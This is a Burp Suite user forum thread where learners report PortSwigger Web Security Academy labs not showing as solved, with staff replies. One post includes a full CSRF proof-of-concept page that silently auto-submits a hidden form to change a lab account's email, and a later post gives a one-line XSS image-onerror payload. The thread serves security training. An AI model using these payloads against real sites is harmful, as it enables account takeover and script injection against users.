Burp Suite User Forum

Create new post

solved lab show not solved

abhineet | Last updated: Mar 28, 2022 08:29AM UTC

Hi, I have solved xss to csrf to change email but it does not show solved after solving the lab

Ben, PortSwigger Agent | Last updated: Mar 28, 2022 08:34AM UTC

Hi, Are you able to provide us with some screenshots and details of what steps you have taken to solve the lab so that we can take a look at this for you? You can send us an email at support@portswigger.net and include the details there.

Cipher | Last updated: Sep 09, 2022 06:34PM UTC

Same problem is arising in my case (Stored XSS into HTML context with nothing encoded) in this lab. Please look into it.

Michelle, PortSwigger Agent | Last updated: Sep 12, 2022 08:00AM UTC

Thanks for your message. If you check your account now, that lab should be showing as solved.

Puneet | Last updated: Dec 08, 2022 10:21AM UTC

Same problem arising in my situation also where i solved sql injection labs but it is keep showing not solved .

Michelle, PortSwigger Agent | Last updated: Dec 08, 2022 03:03PM UTC

Thanks for getting in touch. The original issue reported on this thread was resolved. We've just run some checks, and when we solve labs in the SQL injection section, these are being updated and showing as solved on the list of All Labs. If you're still having issues, can you send some screenshots of the labs you are working on and what you're seeing in your PortSwigger account to support@portswigger.net, please?

Max | Last updated: Mar 08, 2023 02:05AM UTC

Hello, I am also getting the same issue for CSRF Lab-1. Solved the task using VSCode hosted to localhost, it was able to change the E-Mail but the Lab shows it is not solved. I also used the code from hint section. It does the same, shows lab not solved. Here is my code, Thanks: <html> <body> <h1>Random Text</h1> <!-- iframe is used and is set to invisible so that the user is not able to view the attack took place. --> <!-- <iframe style="display:none" name="csrf-iframe"></iframe> --> <!-- URL: https://0a3f006304f03264c1578fa100140072.web-security-academy.net/my-account --> <!-- This is the Host field: 0ad70033045b7e08c80be806003b000d.web-security-academy.net --> <!-- This is the Post field: /my-account/change-email --> <!-- "Action" is where the data is sent, "target" is which window (or tab, frame, iframe) to use for the request. --> <form action="https://0a3f006304f03264c1578fa100140072.web-security-academy.net/my-account/change-email" method="POST" id="csrf-form" target="csrf-iframe"> <input type="hidden" name="email" value="rajhlinux_2@yahoo.com"> </form> <script> document.forms[0].submit(); </script> <!-- <form method="POST" action="https://0a3f006304f03264c1578fa100140072.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="a@aaa.com"> </form> <script> document.forms[0].submit(); </script> --> </body> </html>

Max | Last updated: Mar 08, 2023 02:14AM UTC

Alright, I seem to have solved the lab by sending the body to the postswigger's "exploit server page"

Hariharan | Last updated: Aug 13, 2023 08:36AM UTC

<img src='' onerror='alert(Hi)'>

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.